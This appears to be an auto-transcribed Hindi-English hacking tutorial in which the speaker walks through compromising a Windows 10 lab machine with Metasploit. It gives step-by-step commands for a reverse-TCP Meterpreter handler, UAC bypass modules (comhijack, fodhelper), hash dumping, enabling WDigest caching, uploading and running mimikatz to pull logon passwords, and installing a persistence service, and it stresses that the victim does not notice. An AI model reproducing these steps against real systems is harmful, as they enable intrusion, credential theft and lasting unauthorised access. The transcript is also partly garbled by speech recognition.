नहीं, ऐसा तो नहीं हुआ होगा, ऐसा मत बोलो, मैं दोबारा से वो गलती नहीं कर सकता। ओह नो। ओके, वंस अगेन सॉरी फ्रॉम माय साइड। चलो, इस बार तो सही EXE फाइल बनेगी। ऐसा होता रहता है, बहुत सारी चीजें हम लोग कवर करते हैं, बढ़ाते हैं, तो कभी हाँ कभी हम सर, कॉमन मिस्टेक हो जाता है। ये मतलब अगर हम रियल एरर भी, मतलब जेन्युइन कोई गलती वाली एरर भी दें, तब भी हम उसको ना रियल एरर मानने लगते हैं कि नहीं, ये किसी वायरस की वजह से हो रहा है। राइट, क्योंकि पुरानी हैबिट है ना कि कुछ भी ऐसा देखो मतलब विंडोज को रन नहीं करने दे रही है, मे बी शायद वायरस इफेक्ट। तो हाँ सर। डायरेक्टली हाई लेवल वाले थॉट आ जाते हैं, ये नहीं सोचते कि हमने कुछ गलत कमांड चला दी है। चलो, इसको मैं डिलीट मारता हूँ और इसको मैं ट्रांसफर करता हूँ पेलो 2.exe को। ये ट्रांसफर हो गया एंड एक्सप्लॉइट यहाँ पे ये मेरा इंतजार कर रहा है ऑलरेडी, बस मुझे इसको रन करना है। तो ये मैंने रन कर दिया यार, सही है, बताओ, पेलोड वेलोड सब बढ़िया। इसको क्या प्रॉब्लम हो गई है? हैंडलर नहीं ले रहा। 142 आईपी एड्रेस क्या है? लैलहोस्ट 192.168.142 लैलपोर्ट ये है। एक बार जरा एग्जिट करता हूँ मैं इसमें। ठीक है, और यूज एक्सप्लॉइट मल्टी हैंडलर सेट पेलोड विंडोज स्लैश मीटर प्रीटर स्लैश IVR रिवर्स TCP सेट lhost 192.168.1.142. Check the options and now just hit enter, exploit and just run this file again, open, now check this। अब ठीक है, मैं वो ये हुआ था आई थिंक, देखो यहाँ पे कुछ हुआ था ऑलरेडी, एक सेशन ना एक्टिवेट था यहाँ पे, उसका इशू आ रहा था, तो ये हो गया एक्टिवेट और मैंने एक्सप्लॉइट किया। नाउ लेट मी चेक कि क्या मेरे पास क्या किया, क्या मैंने ये बाईपास अथॉरिटी के लिए है ना, बाईपास यूएससी के लिए, जिसमें P फॉर पेलोड है, E फॉर एनकोडर है, ये एनकोडर हमने यूज किया है, एल होस्ट एल पोर्ट -I5 है, -B एनकोडर्स है, रिमूव फॉर बैड करेक्टर्स एंड F फॉर फॉर्मेट। ठीक है, अब मुझे इसकी ना वो चेक करनी है कि ये इसका लेवल क्या है। गेट यूआईडी, यहाँ पर गेट यूआईडी ये दिखा रहा है, और SH शेल हु हु एम आई में नॉर्मल यूजर ही बता रहा है। ठीक है, तो मैं इसको एग्जिट कर देता हूँ। क्या मैं इसमें हैश डंप कमांड को रन कर सकता हूँ? नहीं कर सकता। अच्छा, एक कमांड थी मेरे पास जिससे मैं ये, जैसे मैं इसको बैकग्राउंड में डालता हूँ, वैसे कुछ नहीं होने वाला। यूएससी को बाईपास करने के लिए मैंने वो किया था,
यूएससी इसने बाईपास कहाँ करी? इसने तो बाईपास की ही नहीं, इसने तो नॉर्मल सिर्फ एक एनकोडर यूज किया, थोड़ा सिक्योरिटी को बाईपास कर दिया होगा मे बी शायद, क्योंकि ये एडमिन नहीं बना है यहाँ पे। अगर एडमिन नहीं है तो फिर यूएससी बाईपास नहीं हुई है। हेल्प dump the content of the same database, get system, get sys। नहीं, अथॉरिटी नहीं है इसके पास ज्यादा अथॉरिटीज। नहीं, मुझे नहीं लगता इसने कोई बाईपास वो किया है कुछ। चलिए कोई नहीं, ये वैसे भी मुझे लग नहीं रहा था, क्योंकि ये वाला मैंने पहले भी बहुत यूज किया है, शिकायत लगाना। ये सिर्फ आपको ना नॉर्मली एंटीवायरस से या छोटी मोटी सिक्योरिटी से बचा लेता है, बट आपको एडमिन नहीं बनाता। ये तो मैंने कभी सोचा ही नहीं, ये एडमिन नहीं बना सकता आपको। एडमिन के लिए अलग से आपको वो यूज करना पड़ता है, एक अलग से ना रजिस्ट्री के एक्सप्लॉइट्स यूज करने पड़ते हैं, जैसे कि मैंने यहाँ पे अलग से बताया भी है, राइट, कि बाईपास यूएसी इन विंडोज 10 यूजिंग बाईपास कोम हाईजैक हैंडलर या एक्सप्लॉइट। राइट, रिक्वायरमेंट क्या है इसकी? यू मस्ट हैव मीटर प्रिटर नॉर्मल शेल। आपके पास एक नॉर्मल मीटर प्रिटर शेल होना कंपलसरी है इफ यू वांट टू बाईपास द यूएसी इन विंडोज 10। ये शायद कुछ और होगा, पता नहीं मैंने क्या लिखा है ये। तो यहाँ पे ये बता रहा है कि ठीक है, हम लोग कॉम हाईजैक का यूज करेंगे बाईपास करने के लिए यूएससी को। ठीक है, इसने कहा कि मीटर प्रिंटर शेल ले लो, गेट यूआईडी करके चेक कर लो, गेट प्रिविलेज कर लो। गेट प्रिविलेज का मतलब है गेट प्रिविलेज। आपके पास 4-5 प्रिविलेज है, मतलब कम से कम आपके पास प्रिविलेज इनेबल्ड है, लेकिन एडमिन यूजर के पास पूरी की पूरी लिस्ट होती है। ठीक है, नाउ अब हम क्या करेंगे? You don't have a system admin authority and privileges, hence we are need to bypass UAC protection of the target system. To perform this attack, you need to manually add bypass com hijack exploit inside a Metasploit framework. So now अब हमें क्या करना है कि ना Metasploit framework के अंदर ना by default com hijack handler जो exploit है ना, ये होता नहीं है, right? bypass UAC com hijack। अब वो हम चेक भी कर सकते हैं, जैसे कि मैं मानो MSF कंसोल को ओपन करता हूँ। ठीक है, तो ना मैं SERC सर्च करता हूँ बाईपास UAC अंडर स्केयर कोम HIJCK कोम हाईजैक। तो यस, इसके अंदर है बाईपास UAC कोम हाईजैक, मतलब अब डाल दिया गया, पहले नहीं था। साफ साफ लिखा हुआ, डिस्क्रिप्शन क्या है? विंडोज एस्केलेट UAC प्रोटेक्शन बाईपास व्यू कोम हाईजैक, व्यू कॉम हैंडलर हाईजैक। तो ये डाल दिया गया है, पहले नहीं था। पहले मैं इसको मैनुअली डालना सिखाता था कैसे मेटास्प्लॉइट के अंदर डालना है। तो यू नीड टू जस्ट यूज दिस मॉड्यूल। तो मैं इसको यहां से तो एग्जिट कर देता हूं। ठीक है, यहाँ पे मेरा ऑलरेडी मीटर शेल है मेरे पास, तो मैं इसको बैकग्राउंड करूंगा कि भाई मेरे पास मेरा नॉर्मल शेल है। नाउ बैकग्राउंड हो गया। बैकग्राउंड करने के बाद मैं इसको यूज करूंगा, यूज एक्सप्लॉइट विंडोज लोकल बाईपास UAC अंडरस्कोर कॉम हाईजैक। हो गया। अब मैं इसको सेट करूंगा, क्योंकि ऑप्शन कमांड रन करोगे तो यहाँ पे साफ साफ नजर आ रहा है विंडोज मीटरप्रेटर रिवर्स TCP। ये ऑलरेडी यहाँ पर सेटेड है कि विंडोज मीटरप्रेटर रिवर्स TCP, बट हमें ये वाला पेलोड नहीं चाहिए फॉर दिस अटैक। हमें अब यहाँ पर ये पेलोड वाला, ये वाला पेलोड X64 सेट करना पड़ेगा। सेट पेलोड, सेट पेलोड विंडोज X64/मीटर प्रीटर METR मीटर प्रीटर। ओके, मीटर प्रीटर एंड देन रिवर्स TCP, रिवर्स अंडरस्कोर TCP। सेट हो गया।
एंड सेशन, ये देखो यहाँ पर ये सेशन आईडी भी मांग रहा है कि आप पुराने वाले उससे पहले वाला जो सेशन है वो देना पड़ेगा। तो मैं सेशन चेक कर लेता हूँ। सेशन आईडी मेरे पास एक है जो कि नॉर्मल यूजर की है, तो मैं प्रोवाइड कर देता हूँ। सेशन सेट सेशन 1, सेशन भी प्रोवाइड हो गया। नाउ एल होस्ट देखो मेरे पास ऑलरेडी अवेलेबल है, पहले से सेट है इसके अंदर। मैं दोबारा भी चेक करा देता हूँ, तो देखो सेट है, तो अब मुझे इसकी जरूरत नहीं है, बस मैं इसको एक्सप्लॉइट कर दूंगा। ठीक है, तो मैंने इसको एक्सप्लॉइट कर दिया। एंड नाउ यू कैन सी UAC is set to default, bypassing UAC can bypass setting this continues। अब ना जो प्रिविलेज एस्केलेशन अटैक में मैंने उस टाइम दिखाया था, तो मैंने विंडो ओपन करके यस क्लिक किया था, उसके बाद मैं एडमिन यूजर बना था, पहली बार जब मैं एडमिन यूजर बना था। वो चीज यहाँ नहीं होने वाली, यहाँ ये ऑटोमेटिकली विदाउट कंफर्मेशन, विदाउट यूएससी बाईपास किए बगैर ही ये उसको, सॉरी, बाईपास यूएससी को बाईपास करके अंदर चला जाएगा और एडमिन अथॉरिटी प्रोवाइड कर देगा। तो अब ये इसको कर रहा है, थोड़ा सा टाइम लेगा ये। विंडोज में भी कोई एक्टिविटी नहीं हो रही है, कोई कंफर्मेशन नहीं है। कर रहा है, ठीक है, करने देते हैं, कुछ ना कुछ तो होगा। देखो ये हुआ है, और यहां से इसके बाद सीधा ये आएगा मीटर डायरेक्टली। मैं अगर एंटर मारूं तो 192.168.1.53 तक तो आ जाना चाहिए था इसको। Cleaning up registry, deleted this file, Metapod 4 open, loading to this, executing high security process। ओके, सो मैं दोबारा बताता हूँ, ये रिकॉर्ड तो भी हो जाएगा। जैसे ही मैंने ये सेशन यहाँ पे कैंसिल किया, तो ऑटोमेटिक जो है यहाँ पे ये मीटर सेशन ओपन मिला। सेशन जब चेक करने पर देखिए, तो हमने 3 बार जो कैंसिल किया था, वो तीनों बार हमें एडमिन का सेशन, सॉरी एडमिन का सेशन नहीं, यूएसी बाईपास का सेशन, तो यूएसी 3 बार इसने बाईपास करी, बट हम देख नहीं पाए थे। तो अब मैंने सेशन -i2 करके सेकंड वाली जो सेशन है वो मैंने स्टार्ट की है, 64 वही है, ये फर्स्ट वाली तो 32 बिट वाली है। गेट यूआईडी कमांड चलाया तो नॉर्मल यूजर दिखा रहा है, गेट सिस्टम किया तो अथॉरिटी दिखा रहा है कि हाँ आपके पास कुछ एक यूएससी तो बाईपास हो, गेट सिस्टम का मतलब है यूएससी आपने बाईपास कर दिया। नाउ गेट प्रिविलेजेस, कितनी ज्यादा परमिशन आपके पास आ गए, तो मेरे पास पहले से ज्यादा परमिशन आ गए हैं। ठीक है, तो दैट मीन्स कि मैंने ना यूएससी को बाईपास कर दिया है। ये देखो हैज डंप कमांड मेरी अब काम कर रही है, जबकि पहले ये काम नहीं करती थी। इससे पहले जो किया था, ये पहली बार अब जाके काम करिए, क्योंकि अब मेरे पास अच्छी अथॉरिटी आई है। तो हैश डंप से मैंने हैश डंप सारे के सारे कर लिए, समझ गए। तो अब मैं इसको एग्जिट करता हूं। ठीक है, तो सेशन 2 क्लोज हो गया मेरा।
अभी भी मेरे पास 3 और 4 सेशन बचे हैं, मुझे इनको भी क्लोज करना पड़ेगा क्योंकि ये भी जल्दबाजी में ले लिए थे। सेशन हाइपन आई 3, ठीक है, तो इसको भी करना पड़ेगा हमें क्लोज। नाउ चेक करो सेशन, एक और बचा हुआ है 4, ठीक है, एंड चलो इसको भी अब हम तो फिर से भाई हमारे पास नॉर्मल यूजर वाला सेशन आ गया। मतलब हमारा जो कॉम हाईजैक हैंडलर था वो परफेक्टली वर्क किया, बस थोड़ा सा ध्यान नहीं दे पाए। अब ये वाला मैं यूज करता हूँ, ठीक है, और इस वाले को यूज करने के लिए मुझे वही यूज करना पड़ेगा, यूज एक्सप्लॉइट विंडोज लोकल बाईपास यूएससी एंड देन FOD फुड हेल्पर। तो मैंने ये वाला एक्सप्लॉइट यूज कर रहा हूँ। नाउ चेक, ये कह रहा है नाउ चेक योर सेशंस। ऑटोमेटिक सेशन ओपन हो रहा है। तो मैंने ये सेशन मैंने चेक किया, सेशन मैंने चेक कर लिया, मेरे पास सेशन है। तो मैंने अब मैं सेट सेशन 1, जो नॉर्मल यूजर वाला सेशन है ना वही यूज करना होता है। तो सेट सेशन 1, और ये इसको तो मैंने लोड कर ही लिया है, फूड हेल्पर को लोड है, ये देखो यहाँ पे लोडेड है। ये लोड होने के बाद सेशन में सेट करूंगा, और सेशन सेट करने के बाद मैं दोबारा से एक्सप्लॉइट वाली कमांड रन कर दूंगा। तो ये मुझे वैलिडेट सेशन वैलिडेट नहीं हो पा रहा है। आई हैव वन मोर, ठीक है, मैं दोबारा से इसको स्टार्ट कर लेता हूँ, फिर से मैं नॉर्मल यूजर का बोलूंगा। और नॉर्मल यूजर के लिए मेरे पास वो है, क्या बोलते हैं उसको, ये पेलोड 2 है ना, पेलोड 2 से ले लूंगा मैं, ठीक है। यूज एक्सप्लॉइट सेट पेलोड, विंडोज METER मीटर प्रीटर, तो ये मैंने ले लिया, ठीक है। और इसके बाद सीधे मैं रन करता हूँ, बाकी सारी चीजें सेट है, और मैं इसको रन कर देता हूँ, ठीक है। शेल मिला, यस शेल मिल गया मुझे, नॉर्मल यूजर का शेल। अब मैं फिर से वही यही वाला यूज करूंगा, यूज एक्सप्लॉइट विंडोज लोकल बाईपास UAC फूड हेल्पर, ठीक है। यूज एक्सप्लॉइट, सॉरी मीटर पीटर सेशन मिला हुआ है, तो अब हमें इसको ना बैकग्राउंड करना पड़ेगा पहले, इसके बाद ही मैं ये कमांड चला सकता हूँ, यूज एक्सप्लॉइट विंडोज लोकल बाईपास UAC अंडरस्कोर फूड हेल्पर। नाउ सेशन कमांड आप रन करोगे तो सेशन अपना चेक करोगे, फिर उसके बाद सेशन को सेट करना है, सेट सेशन 1, सेशन अब सेट हो गया, अब कोई एरर नहीं आई है। नाउ जस्ट एक्सप्लॉइट इट। क्या प्रॉब्लम है, सेट सेशन 1, अच्छा मुझे ना ऑप्शन कमांड को चेक करने दो, ये कोई ऑप्शन की एरर दे रहा है मुझे। हाँ यहाँ पे सेशन ना सेट नहीं हुआ है, सेट SESS सेशन 1, अब सेट हो गया सेशन, ठीक है। एक्सप्लॉइट और ये देखो मीटर पीटर सेशन 2 ओपन, तो ये हमारा जो है ओपन हो गया। सबसे पहले हम गेट सिस्टम को चेक करेंगे कि अथॉरिटी है, यस अथॉरिटी है। गेट प्रिविलेजेस चेक करेंगे, यस अथॉरिटी है। फिर हैज स्टम्प चेक करेंगे,
तो यहाँ पे हैज डंप नहीं दे रहा है, बट अथॉरिटी मिल गई है, काफी सारी चीजों की अथॉरिटी फिर भी है हमारे पास। प्लस हमें यूएससी बाईपास, यूएससी को ना बार बार यहाँ पर आके ना यस और नो वाला वो नहीं करना पड़ रहा, विक्टिम को पता भी नहीं चल रहा है कि उसकी यूएससी बाईपास भी हो गई है, राइट। तो वो है, तो अच्छा है हमारे पास ये आ गया। समझ गए। तो नॉर्मल सिस्टम का एक्सेस लेना और यूएससी बाईपास करना और एडमिन बनना, तीनों में डिफरेंस है। नॉर्मल सिस्टम मतलब कोई खास ज्यादा अथॉरिटी नहीं, यूएससी मिलना, यूएससी बाईपास कर देना, उसका मतलब है कि ना कुछ हद तक ना काफी ज्यादा परमिशंस मिल गई हैं, क्योंकि आपने यूएससी को बाईपास कर दिया। यूएससी बाईपास कर दिया तो मतलब काफी हद तक बहुत सारी परमिशंस मिल गई हैं। और एडमिन का मतलब होता है ना सारी परमिशन है आपके पास। तो ये जो मैं दिखा रहा हूं अब, ये एडमिन वाला नहीं है पार्ट। एडमिन के लिए प्रिविलेज एस्केलेशन अटैक करना पड़ता है, जो मैंने ऊपर दिखाया था। ये प्रिविलेज एस्केलेशन नहीं है। प्रिविलेज एस्केलेशन का मतलब है एंटी अथॉरिटी सिस्टम वाला यूजर मिल जाना, और यहाँ हर बार हमें सेम सेम 10 वाला यूजर ही मिल रहा है, लेकिन विद ज्यादा परमिशंस के साथ, क्योंकि हम यूएससी बाईपास कर करके ले रहे हैं। सेम एज वेल आप ये वाला ट्राई करोगे इवेंट रजिस्ट्री की खुद से। विंडो 10 पासवर्ड एंड प्लेन टेक्स्ट क्रेडेंशियल्स, चलिए शुरू करते हैं ये वाला पार्ट। अच्छा, ये क्या कह रहा है, विंडोज 10 का पासवर्ड क्रैक करना है ऑन विंडोज 10, विंडो 12 और हायर डिवाइस सिक्योरिटी प्रोवाइडर इज डिसेबल डिफॉल्ट। मे बी ये शायद वर्क नहीं करेगा। सिक्योरिटी इश्यूज की वजह से हो सकता है ये वर्क ना करे, बट मैं आपको दिखाऊंगा जरूर, ठीक है। तो यहाँ पे ये कह रहा है कि the digest security provider is disabled by default. This module enable disable credential. This module enable and disable credential caching by adding changing the value of a use logon credential dword under the wdigest provider registry की। रजिस्ट्री की के बारे में अगर नहीं पढ़ा है तो पढ़ लेना, क्योंकि बहुत बाईपासिंग के मामले में बहुत यूज होती है। Any subsequent logins will allow Mimikatz to recover the plain text password from the system's memory. Good. After getting full privilege interpreter shell. यहाँ पे ये कह रहा है पहले आपको रिक्वायरमेंट है कि आपके पास ना फुल प्रिविलेज इंटरप्रेटर शेल होनी चाहिए, ठीक है। एडमिन की बात नहीं कर रहा है यहाँ पे, ये शायद ये फुल प्रिविलेज की ही बात कर रहा है। तो अभी अभी मैंने जस्ट क्या कर दिया, मैंने कुछ नहीं किया। मैंने ये, मुझे दोबारा से वो फूड हेल्पर वाला जो सेशन था ना वो दोबारा लेना पड़ेगा, सेशन 2 वाला। गलती कर दी मैंने, ठीक है। तो यूज एक्सप्लॉइट विंडोज लोकल, लोकल के बाद क्या था, बाईपास यूएससी, लोकल बाईपास यूएससी, यस लोकल बाईपास यूएससी अंडरस्कोर फूड हेल्पर। ऑप्शन कमांड में जाना है, सेट सेशन सेट है, बाकी सारी चीजें सेट है, बस एक्सप्लॉइट लगा के मेटाप्रेटर सेशन 2 आपको मिल जाएगा, ज्यादा परमिशंस वाला। मतलब यहाँ पे बोल भी रहा है ना, आफ्टर गेटिंग फुल प्रिविलेज इंटरप्रेटर शेल। तो मेरे पास एक ऐसी सेल आ गई जिसमें ना काफी अच्छे प्रिविलेजेस है मेरे पास। ट्राई मार के दे देते हैं, अगर ये अटैक काम नहीं करा तो मतलब समझ जाना कि ना एडमिन शेल चाहिए। अच्छा, एक चीज और है इसमें मुझे कुछ अलग, नहीं, चलो ठीक है। फुल प्रिविलेज सेल मिल गया,
इंटरप्रेटर सेकंड सेल है मेरे पास। नाउ अब मैं बैकग्राउंड करूंगा इसको भी बीएससी के बैकग्राउंड, ठीक है। अब मेरे पास सेशन देख लो, सेशन 1 है नॉर्मल यूजर वाला, सेशन 3 है लेकिन ज्यादा प्रिविलेजेस के साथ है, ज्यादा परमिशंस है मेरे पास इसमें, ठीक है। अब मैं क्या करता हूं, यूज पोस्ट विंडोज मैनेज डब्ल्यू डाइजेस्ट कैशिंग सेट सेशन। अब सेशन दूंगा यहाँ पे 3, क्योंकि जो सेकंड वाला है मेरे पास, तो सेकंड सेशन 3 दूंगा मैं यहाँ पे, क्योंकि उसके पास ज्यादा परमिशंस है। ऑप्शन से देखता हूँ कुछ बचा तो नहीं है, कुछ नहीं बचा है, जस्ट आपको एक्सप्लॉइट रन करना है। तो मैंने एक्सप्लॉइट किया, ठीक है। उसके बाद सेशन -i2 यानी कि वही सेकंड वाले सेशन पे जाना है। सेशन -i मतलब हमारे लिए कौन सा है, थर्ड, ठीक है। तो मैं थर्ड वाले सेशन पे आ गया। नाउ कह रहा है सेंड मिमिकाज फाइल टू द टारगेट सिस्टम, ठीक है। अब आपके पास मिमिकाज .exe फाइल होगी और उसे आपको टारगेटेड सिस्टम पर अपलोड करना पड़ेगा, ठीक है। तो हमारे पास यूजर शेयर विंडोज रिसोर्स मिमिकाज के अंदर 64-bit mimikaz.exe फाइल अवेलेबल है। So you can check this by using this ls/user share windows resource के अंदर, ठीक है। और मिमिकाज एंड x64 के अंदर ये देखो mimikaz.exe फाइल अवेलेबल है। तो हम इसी फाइल को कॉपी करेंगे, इस फाइल को कॉपी करेंगे, अपलोड करेंगे इस फाइल को डायरेक्टली, ठीक है। तो मैं ये है, तो मैं क्या करता हूँ, मैं पूरा इसी का पाथ कॉपी करता हूँ, ये मेरा पाथ हो गया। डायरेक्टली यहाँ पे मैं क्या करूंगा, अपलोड वाला ऑप्शन, और यहाँ पे ये कमांड पेस्ट कर दी पूरी की पूरी, ये फाइल अपलोड हो जाएगी विक्टिम के सी ड्राइव में। आप चाहो तो पाथ भी प्रोवाइड कर सकते हो कि भाई इस पर्टिकुलर लोकेशन पर इस फाइल को पहुंचा देना, ठीक है। तो मैं सी ड्राइव पर पहुंचा रहा हूँ, ठीक है। फाइल अपलोडेड, either you can see here inside a C drive there is a mimikaz.exe file आ गई। ठीक है। अब क्या है, आपने ये कर दिया, ये कर दिया, एंड देन नाउ अब आप क्या करोगे, शेल एक्सेस करो। शेल एक्सेस कर लिया। अब शेल एक्सेस करने के बाद ये कह रहा है कि आप ना मिमिकाज को स्टार्ट करो, ठीक है। तो dir कमांड, और ये रहा आपका मिमिकाज। तो यहाँ पे टैब तो काम नहीं करता, बट मैं यहाँ पे ये कर देता हूँ, ये देखो। तो हम मिमिकाज को यूज कर पा रहे हैं यहाँ पे। अब यहाँ पे हम इसके बाद ये वाली प्रिविलेज PRIVELEG प्रिविलेज PRIVILEG कॉलन कॉलन एंड देन डिबग करेंगे। प्रिविलेज कॉलन कॉलन डिबग, प्रिविलेज 20 ओके बोल रहा है। उसके बाद है sec URL ऐसे कॉलन लोगोन पासवर्ड्स। अब यहाँ पे वो पासवर्ड क्रैक हो जाना चाहिए अगर मेरी विंडो की सिक्योरिटी क्लोज होगी तो, अगर नहीं है तो शायद पासवर्ड नहीं, वैसे तो मना कर रहा है, नल दिखा रहा है। प्लेन टेक्स्ट में वैसे पासवर्ड मिल जाता है। जो भी यूजर होते हैं सबके पासवर्ड क्रैक कर देता है। सैम 10 का पासवर्ड है यहाँ पे, क्रैक नहीं कर रहा ये बंदा। हाँ देखो एक चीज है, आपका जो है जो सैम 10 है, ये सैम 10 यूजर, बट उसका ना NTLM है जिसने मुझे दे दिया है,
अब देखो हैज मिल गया है तो कंफर्म है आप पासवर्ड ब्रेक कर ही दोगे, है ना? क्या मैंने आपको हैज क्रैक करना नहीं सिखाया? क्रैक करना सिखाया है आपको। आपके पास एनटीएलएम हैज आ गया तो आप इजिली इसका हैश क्रैक कर सकते हो। अब देखो यहाँ पर जो है सर्विस परसिस्टेंट बनाने के लिए कुछ चीजें हैं। मल्टीपल वेज टू परसिस्टेंट ऑन विंडोज 10 विद मेटास्प्लॉइट। मतलब ये है कि अब जैसे मैंने ना इसको एक्सेस किया हुआ है, ये वाला प्रोसेस करने के लिए यू हैव टू एडमिन शेल। आपके पास एडमिन शेल होना जरूरी है, तब ये आप परफॉर्म कर सकते हो। मतलब आप ना पहले विक्टिम को हैक करोगे, हैक करने के बाद उसका एडमिन शेल लोगे, और एडमिन शेल लेने के बाद का प्रोसेस है ये, राइट? जो कि हमने उसमें प्रिविलेज एस्केलेशन में किया था, नॉर्मल यूजर से एडमिन यूजर में बने थे। तो वही एक मेथड है जिसमें हम एडमिन शेल लेते हैं, ठीक है? उसके बाद का ये प्रोसेस है कि यहाँ पे हम जो है परसिस्टेंट कैसे बनाए सर्विस को। परसिस्टेंस का मतलब ये होता है कि अगर मैंने विंडो हैक की हुई है और अगर यूजर अपने सिस्टम को रीस्टार्ट कर देता है, तो क्या मैं दोबारा, तो क्या मुझे, मतलब क्या अभी भी वो मैं उसे हैक किया हुआ हूँ? नहीं, अब कनेक्शन टूट चुका है। और अगर मुझे दोबारा कनेक्शन चाहिए तो उस विक्टिम को दोबारा से मेरी उसी फाइल पर क्लिक करना पड़ेगा, तभी मैं उसका दोबारा कनेक्शन ले पाऊंगा, राइट? तो ये एक प्रॉब्लम है। तो हमें क्या करना पड़ेगा? हमें कुछ ऐसा करना पड़ेगा ना कि परसिस्टेंस बना रहे, यानी परमानेंटली उसका विंडो हैक हो जाए, चाहे वो रीस्टार्ट करे, शट डाउन करे, 4 दिन बाद खोले, 2 महीने बाद खोले, उसका परमानेंट हैक होना चाहिए, राइट? तो उसका ये मेथड है कि अपने शेल को, अपने वायरस को ना परसिस्टेंट या फिर परमानेंट कैसे बनाएं। लेकिन उसके लिए आपके पास उसकी एडमिन शेल का एक्सेस होना चाहिए, जो कि आपको मिलेगा प्रिविलेज एस्केलेशन अटैक की वजह से, ठीक है? तो मैं ये दिखा देता हूं, और मुझे प्रिविलेज एस्केलेशन अटैक ही चाहिए इसका। वैसे इसमें पासवर्ड नजर आता है कि नहीं आता मुझे कुछ पता नहीं है, बट मतलब मैंने देखा तो है, लिखा भी है, प्लान टेक्स्ट में आता है। मैं इसकी सिक्योरिटी को जरा चेक कर लेता हूँ एक बार। मे भी शायद मेरे सिस्टम में वो सिक्योरिटी इनेबल होगी। चलो जाने देते हैं। मल्टीपल वेज एडमिन शेल चाहिए, तो पहले हमें नॉर्मल शेल लेनी पड़ेगी, फिर उसका प्रिविलेज एस्केलेशन अटैक करेंगे, और उसके बाद एडमिन शेल मिल जाएगी। उसके बाद फिर हम यहाँ पर आएंगे परसिस्टेंट सर्विस बनाने के लिए।
तो चलो फिर हम लोग करते हैं, इसको एग्जिट किया, इसको भी एग्जिट करते हैं, और सॉरी एग्जिट करेंगे इसको भी। तो मेरा सेशन 3 जो है क्लोज हो गया है। यहाँ पे आप देख ही रहे हो कि मेरे पास अभी नॉर्मल यूजर का एक्सेस अभी भी है, ठीक है। और अब इस नॉर्मल यूजर की हेल्प से मैं एडमिन शेल में कन्वर्ट करूंगा खुद को, और उसके लिए मैं यूज करूंगा प्रिविलेज एस्केलेशन अटैक, ये वाला गेट मीटर शेल गेट सिस्टम बैकग्राउंड। तो मैं ऑलरेडी बैकग्राउंड में हूँ ही, हाँ बैकग्राउंड में ही हूँ ना, यस बैकग्राउंड। उसके बाद यूज एक्सप्लॉइट विंडोज लोकल ASK आस्क, एंड देन उसके बाद सेट सेशन 1 सेट टेक्निक PSH PowerShell एंड एक्सप्लॉइट। अब ये ना प्रिविलेज एस्केलेशन टेक्निक है, यहाँ पे भी UAC बाईपास नहीं होगा, मतलब बाईपास करने की कोशिश करी बट होगा नहीं। तो यहाँ पे जैसे ही मैं एक्सप्लॉइट मारूंगा तो विंडोज में ऑटोमेटिकली UAC को ऑन करने के लिए यस और नो का ऑप्शन आएगा। आवाज आई होगी अगर सुना होगा तो आपने। तो यहाँ पे मुझे यस अपनी तरफ से करना पड़ रहा है, मतलब अब जाके UAC बाईपास हुई है, मतलब बाईपास नहीं हुई, मतलब परमिशन दे दी मैंने खुद ही। तो मुझे क्या है, मैंने यस दबाने का मतलब है कि मैं खुद उसको एडमिन का एक्सेस प्रोवाइड कर रहा हूँ, राइट। ठीक है, तो अब आगे भी बढ़ो यार। परमिशन मिल गई, तो सेशन करता हूँ। सेशन 1 ही है अभी भी, शायद मुझे एक्सप्लोर दोबारा करना पड़ेगा। अब ठीक है, तो अब मेरे पास सेशन आ गया है। तो ये जो सेशन आया है ये एडमिन वाला सेशन आया है। सो लेट मी शो यू गेट UID। नहीं यार ऐसा नहीं कर सकता तू। शेल हु एम आई, ये तो यार होना चाहिए था। एंटी अथॉरिटी सिस्टम पिछली बार आया था। एग्जिट गेट प्रिविलेजेस, अथॉरिटी है, काफी सारी अथॉरिटी है हमारे पास। गेट सिस्टम एडमिन वाला एक्सेस भी लग रहा है बट एंटी अथॉरिटी दिखा नहीं रहा है। करके देखते हैं। वैसे ये पूरी तरीके से एडमिन मुझे लग नहीं रहा है, क्योंकि वहां पे गेट UID में वैसा कुछ खास दिखाया नहीं उसने, एंटी अथॉरिटी नहीं दिखा रहा ना। बट हम ट्राई मार के देखते हैं इसी कम प्रिविलेजेस वाले से। चलो 2 सेशन है 1 और 4। हाँ ये देखो एंटी अथॉरिटी सिस्टम, ठीक है एक्सेस मिल गया है, एक्सेस है, बस वो पता नहीं क्यों सैम 10 को ही दिखा रहा था। तो सर्विस परसिस्टेंस का हम यूज करेंगे परमानेंट पेलोड उसमें विंडोज के अंदर डालने के लिए, ठीक है। तो मैं यूज एक्सप्लॉइट विंडोज लोकल परसिस्टेंस सर्विस, परसिस्टेंस सर्विस का यूज करूंगा मैं, और ऑप्शंस में चेक करूंगा। तो ऑप्शंस में सारी चीजें ठीक है, बस सेट सेशंस मुझे सेट करना है, वो भी दूसरा वाला सेशन मांग रहा है, मतलब मुझे चौथा नंबर का सेशन सेट करना है एडमिन वाला। सेट एलपोर्ट सेट
L port, yeah, L port क्यों चेंज कर दिया यहाँ पे? फाइव सिक्स सेवन एट, 5678, ठीक है। और उसके बाद एक्सप्लॉइट, वो इसलिए क्योंकि हाँ ये देखो हो गया, मेटाप्रेटर सेशन 3 ओपन हो गया, ठीक है। 5678 जो पोर्ट नंबर दिया है वो इसलिए दिया है क्योंकि हमने एक परमानेंट W0TOEXE के नाम से एक फाइल यहाँ इस पर्टिकुलर लोकेशन पर डाल दी है। अब ये फाइल ऑन होगी, परमानेंटली सेट हो गई है विंडोज की परसिस्टेंट सर्विस में। विंडो अब चाहे रीस्टार्ट हो, शटडाउन हो, ये वाली सर्विस, ये वाली फाइल ऑलवेज ऑटोमेटिक रीस्टार्ट होगी। तो जब ये रीस्टार्ट होगी तो ये सर्विस पर लिसनिंग करेगी, और लिसनिंग करेगी तो हम जब भी आएंगे तब इसे हैक कर सकते हैं। तो ठीक है, हम लोग क्या करते हैं इसमें, ये तो हो गया। अब मैं ना इस विंडो को रीस्टार्ट करता हूँ। रीस्टार्ट करूंगा, जाहिर सी बात है कनेक्शन मेरा ब्रेक होगा, ऑब्वियसली ब्रेक होगा। सेशन 5 दिखा रहा है, ठीक है। तो मैं क्या करता हूँ, एस सेशन -i5 लॉगिन कर लिया, SYS sysinfo। कुछ खास इन्फॉर्मेशन नहीं, मतलब सेशन बोल रहा है कि सेशन अभी भी एक्टिवेट है है, बट डेटा नहीं दिखा रहा ना। तो हम लोग बैकग्राउंड करेंगे और मैं ना दोबारा से एक्सप्लोर मारूंगा। सिस्टम को रीस्टार्ट किया, दोबारा से यूज एक्सप्लोइट मल्टी हैंडलर स्टार्ट करना है। 